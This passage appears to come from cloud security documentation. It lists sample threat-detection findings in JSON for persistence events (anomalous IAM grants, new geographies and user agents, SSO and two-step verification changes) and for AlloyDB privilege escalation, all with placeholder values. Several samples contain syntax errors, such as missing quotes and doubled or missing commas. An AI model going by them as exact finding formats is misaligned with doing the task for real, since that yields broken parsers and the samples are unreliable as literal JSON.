"PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "iam_anomalous_grant", "subRuleName": "TYPE_OF_ANOMALOUS_GRANT" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "GOOGLE_CLOUD_RESOURCE_NAME" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1678897327", "nanos": 26483000 }, "insertId": "INSERT_ID" } } ], "properties": { "sensitiveRoleGrant": { "principalEmail": "PRINCIPAL_EMAIL", "bindingDeltas": [ { "action": "ADD", "role": "roles/GRANTED_ROLE", "member": "serviceAccount:SERVICE_ACCOUNT_NAME", } ], "members": [ "serviceAccount:SERVICE_ACCOUNT_NAME" ] } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": { "displayName": "Related Anomalous Grant Findings", "url": "LINK_TO_RELATED_FINDING" } } } }
Persistence: New AI API Method
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS, "callerIpGeo": { "regionCode": "US" }, "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "principalSubject": "PRINCIPAL_SUBJECT", "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Persistence: New AI API Method", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-01-12T10:35:47.381Z", "database": {}, "eventTime": "2023-01-12T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "PERSISTENCE", }, "muteInfo": { "staticMute": { "state": "UNDEFINED", "applyTime": "1970-01-01T00:00:00Z" } }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "ruleName": "ai_anomalous_behavior_new_api_method", }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": { "newApiMethod": { "newApiMethod": { "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME" }, "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerUserAgent": "CALLER_USER_AGENT", "resourceContainer": "projects/PROJECT_NUMBER" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0003/" } } } }
Persistence: New API Method
{ "findings": { "access": { "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS, "callerIpGeo": { "regionCode": "US" }, "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME", "principalSubject": "PRINCIPAL_SUBJECT", "serviceAccountKeyName": "SERVICE_ACCOUNT_KEY_NAME" }, "assetDisplayName": "ASSET_DISPLAY_NAME", "assetId": "organizations/ORGANIZATION_NUMBER/assets/ASSET_ID", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "category": "Persistence: New API Method", "contacts": { "security": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] }, "technical": { "contacts": [ { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" }, { "email": "EMAIL_ADDRESS" } ] } }, "createTime": "2023-01-12T10:35:47.381Z", "database": {}, "eventTime": "2023-01-12T10:35:47.270Z", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_NUMBER/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": {}, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_NUMBER/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "sourceDisplayName": "Event Threat Detection", "state": "ACTIVE", "vulnerability": {}, "workflowState": "NEW" }, "resource": { "name": "RESOURCE_NAME", "display_name": "RESOURCE_DISPLAY_NAME", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "parent_display_name": "FOLDER_NAME", "type": "RESOURCE_TYPE", "folders": [ { "resourceFolderDisplayName": "FOLDER_NAME", "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER" } ] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_NUMBER" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "anomalous_behavior", "subRuleName": "new_api_method" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1673519681", "nanos": 728289000 }, "insertId": "INSERT_ID" } } ], "properties": { "newApiMethod": { "newApiMethod": { "serviceName": "SERVICE_NAME", "methodName": "METHOD_NAME" }, "principalEmail": "PRINCIPAL_EMAIL", "callerIp": "IP_ADDRESS", "callerUserAgent": "CALLER_USER_AGENT", "resourceContainer": "projects/PROJECT_NUMBER" } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/tactics/TA0003/" } } } }
Persistence: New Geography
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//k8s.io/coordination.k8s.io/v1/namespaces/kube-node-lease/leases/gke-cscc-security-tools-default-pool-7c5d7b59-bn2h", "state": "ACTIVE", "category": "Persistence: New Geography", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "iam_anomalous_behavior", "subRuleName": "ip_geolocation" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "RESOURCE_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1617994703", "nanos": 5.08853E8 }, "insertId": "INSERT_ID" } }], "properties": { "anomalousLocation": { "anomalousLocation": "BE", "callerIp": "IP_ADDRESS", "principalEmail": "PRINCIPAL_EMAIL", "notSeenInLast": "2592000s", "typicalGeolocations": [{ "country": { "identifier": "US" } }] } }, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-04-09T18:58:23.508853Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-09T18:59:43.860Z", "createTime": "2021-04-09T18:59:44.440Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "RESOURCE_NAME" } }
Persistence: New Geography for AI Service
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "state": "ACTIVE", "category": "Persistence: New Geography for AI Service", "serviceName": "aiplatform.googleapis.com", "methodName": "METHOD_NAME", "mitreAttack": { "primaryTactic": "PERSISTENCE", "primaryTechniques": [ "CLOUD_ACCOUNTS" ] }, "domains": [ { "category": "AI" }, { "category": "IDENTITY_AND_ACCESS" } ], "aiModel": { "name": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "deploymentPlatform": "VERTEX_AI" }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-04-09T18:59:43.860Z", "createTime": "2021-04-09T18:59:44.440Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "displayName": "projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "organization": "organizations/ORGANIZATION_ID" }, "type": "google.aiplatform.Model", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "ai_iam_anomalous_behavior_ip_geolocation" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//aiplatform.googleapis.com/projects/PROJECT_NUMBER/locations/us-central1/models/MODEL_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1675913160", "nanos": 929341814 }, "insertId": "o5ii7hddddd" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/004/" } } } }
Persistence: New User Agent
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID9/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID9", "resourceName": "//monitoring.googleapis.com/projects/PROJECT_ID", "state": "ACTIVE", "category": "Persistence: New User Agent", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "persistence", "indicator": "audit_log", "ruleName": "iam_anomalous_behavior", "subRuleName": "user_agent" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//monitoring.googleapis.com/projects/PROJECT_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "1614736482", "nanos": 9.76209552E8 }, "insertId": "INSERT_ID" } }], "properties": { "anomalousSoftware": { "anomalousSoftwareClassification": ["USER_AGENT"], "behaviorPeriod": "2592000s", "callerUserAgent": "USER_AGENT", "principalEmail": "USER_EMAIL@PROJECT_ID.iam.gserviceaccount.com" } }, "findingId": "FINDING_ID", "contextUris": { "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-03-03T01:54:42.976209552Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22PROJECT_ID%22?project\u003dPROJECT_ID" }] } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-03-03T01:54:47.681Z", "createTime": "2021-03-03T01:54:49.154Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID" }, "resource": { "name": "//monitoring.googleapis.com/projects/PROJECT_ID" } }
Persistence: SSO Enablement Toggle
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings", "state": "ACTIVE", "category": "Persistence: SSO Enablement Toggle", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "account_manipulation", "indicator": "audit_log", "ruleName": "sso_enablement_toggle" }, "detectionPriority": "HIGH", "affectedResources": [{ "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "projectId": "0", "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1622829313", "nanos": 3.42104E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "admin.googleapis.com", "methodName": "google.admin.AdminService.toggleSsoEnabled", "ssoState": "ENABLED", "domainName": "ORGANIZATION_NAME" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1098/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-04T17:55:13.342104Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#TOGGLE_SSO_ENABLED" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-06-04T17:55:13.342Z", "createTime": "2021-06-04T17:55:15.900Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings" } }
Persistence: SSO Settings Changed
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings", "state": "ACTIVE", "category": "Persistence: SSO Settings Changed", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "account_manipulation", "indicator": "audit_log", "ruleName": "sso_settings_changed" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" } ], "evidence": [{ "sourceLogId": { "projectId": "0", "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1621624109", "nanos": 3.73721E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "admin.googleapis.com", "methodName": "google.admin.AdminService.changeSsoSettings", "domainName": "ORGANIZATION_NAME" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1098/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-05-21T19:08:29.373721Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%220%22?project\u003d0" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#CHANGE_SSO_SETTINGS" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-05-21T19:08:29.373Z", "createTime": "2021-05-27T11:36:24.429Z", "severity": "HIGH", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/domainSettings" } }
Persistence: Strong Authentication Disabled
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/securitySettings", "state": "ACTIVE", "category": "Persistence: Strong Authentication Disabled", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "impair_defenses", "indicator": "audit_log", "ruleName": "enforce_strong_authentication" }, "detectionPriority": "MEDIUM", "affectedResources": [{ "gcpResourceName": "//admin.googleapis.com/organizations/ORGANIZATION_ID/securitySettings" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1623952110", "nanos": 6.51337E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "admin.googleapis.com", "methodName": "google.admin.AdminService.enforceStrongAuthentication", "principalEmail": "PRINCIPAL_EMAIL" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1562/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-06-17T17:48:30.651337Z%22%0AinsertId%3D%22INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-06-17T17:48:30.651Z", "createTime": "2021-06-17T17:48:33.574Z", "severity": "MEDIUM", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT" }, "resource": { "name": "//admin.googleapis.com/organizations/ORGANIZATION_ID/securitySettings" } }
Persistence: Two Step Verification Disabled
This finding isn't available for project-level activations.
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID", "state": "ACTIVE", "category": "Persistence: Two Step Verification Disabled", "sourceProperties": { "sourceId": { "organizationNumber": "ORGANIZATION_ID", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "technique": "impair_defenses", "indicator": "audit_log", "ruleName": "two_step_verification_disabled" }, "detectionPriority": "LOW", "affectedResources": [{ "gcpResourceName": "//login.googleapis.com/organizations/ORGANIZATION_ID" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID" }], "evidence": [{ "sourceLogId": { "resourceContainer": "organizations/ORGANIZATION_ID", "timestamp": { "seconds": "1626391356", "nanos": 5.96E8 }, "insertId": "INSERT_ID" } }], "properties": { "serviceName": "login.googleapis.com", "methodName": "google.login.LoginService.2svDisable", "ssoState": "UNKNOWN", "principalEmail": "PRINCIPAL_EMAIL" }, "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1556/006/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "https://console.cloud.google.com/logs/query;query\u003dtimestamp%3D%222021-07-15T23:22:36.596Z%22%0AinsertId%3D%INSERT_ID%22%0Aresource.labels.project_id%3D%22%22?project\u003d" }], "workspacesUri": { "displayName": "Workspaces Link", "url": "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/login#2sv_disable" } } }, "securityMarks": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks" }, "eventTime": "2021-07-15T23:22:36.596Z", "createTime": "2021-07-15T23:22:40.079Z", "severity": "LOW", "workflowState": "NEW", "canonicalName": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "findingClass": "THREAT", "indicator": { } }, "resource": { "name": "//login.googleapis.com/organizations/ORGANIZATION_ID" } }
Privilege Escalation: AlloyDB Database Superuser Writes to User Tables
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME", "state": "ACTIVE", "category": "Privilege Escalation: AlloyDB Database Superuser Writes to User Tables", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "alloydb_user_granted_all_permissions", }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME" } ], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/001/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }] } }, "eventTime": "EVENT_TIMESTAMP",, "createTime": "CREATE_TIMESTAMP",, "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "VALID_ACCOUNTS" ], "additionalTactics": [ "PERSISTENCE" ], "additionalTechniques": [ "ACCOUNT_MANIPULATION" ] }, "database": { "displayName": "DATABASE_NAME", "userName": "USER_NAME", "query": QUERY", }, "access": { "serviceName": "alloydb.googleapis.com", "methodName": "alloydb.instances.query" } }, "resource": { "name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME", "displayName": "projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME", "type": "google.alloydb.Instance", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "alloydb.googleapis.com", "location": "REGION", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": FOLDER_NAME } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_NAME" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": "organizations/ORGANIZATION_ID/folders/FOLDER_NUMBER/projects/PROJECT_NUMBER" } }
Privilege Escalation: AlloyDB Over-Privileged Grant
{ "finding": { "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "resource_name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME", "state": "ACTIVE", "category": "Privilege Escalation: AlloyDB Over-Privileged Grant", "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "alloydb_user_granted_all_permissions", }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME" } ], "evidence": [{ "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } }], "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1078/001/" }, "cloudLoggingQueryUri": [{ "displayName": "Cloud Logging Query Link", "url": "LOGGING_LINK" }] } }, "eventTime": "EVENT_TIMESTAMP",, "createTime": "CREATE_TIMESTAMP",, "severity": "LOW", "workflowState": "NEW", "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID" "mute": "UNDEFINED", "findingClass": "THREAT", "mitreAttack": { "primaryTactic": "PRIVILEGE_ESCALATION", "primaryTechniques": [ "VALID_ACCOUNTS" ], "additionalTactics": [ "PERSISTENCE" ], "additionalTechniques": [ "ACCOUNT_MANIPULATION" ] }, "database": { "displayName": "DATABASE_NAME", "userName": "USER_NAME", "query": QUERY", "grantees": [GRANTEE], }, "access": { "serviceName": "alloydb.googleapis.com", "methodName": "alloydb.instances.query" } }, "resource": { "name": "//alloydb.googleapis.com/projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME", "displayName": "projects/PROJECT_ID/locations/REGION/clusters/CLUSTER/instances/INSTANCE_NAME", "type": "google.alloydb.Instance", "cloudProvider": "GOOGLE_CLOUD_PLATFORM", "service": "alloydb.googleapis.com", "location": "REGION", "gcpMetadata": { "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "projectDisplayName": "PROJECT_ID", "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "parentDisplayName": "PROJECT_ID", "folders": [ { "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER", "resourceFolderDisplayName": FOLDER_NAME } ], "organization": "organizations/ORGANIZATION_ID" }, "resourcePath": { "nodes": [ { "nodeType": "GCP_PROJECT", "id": "projects/PROJECT_NUMBER", "displayName": "PROJECT_ID" }, { "nodeType": "GCP_FOLDER", "id": "folders/FOLDER_NUMBER", "displayName": "FOLDER_NAME" }, { "nodeType": "GCP_ORGANIZATION", "id": "organizations/ORGANIZATION_ID" } ] }, "resourcePathString": 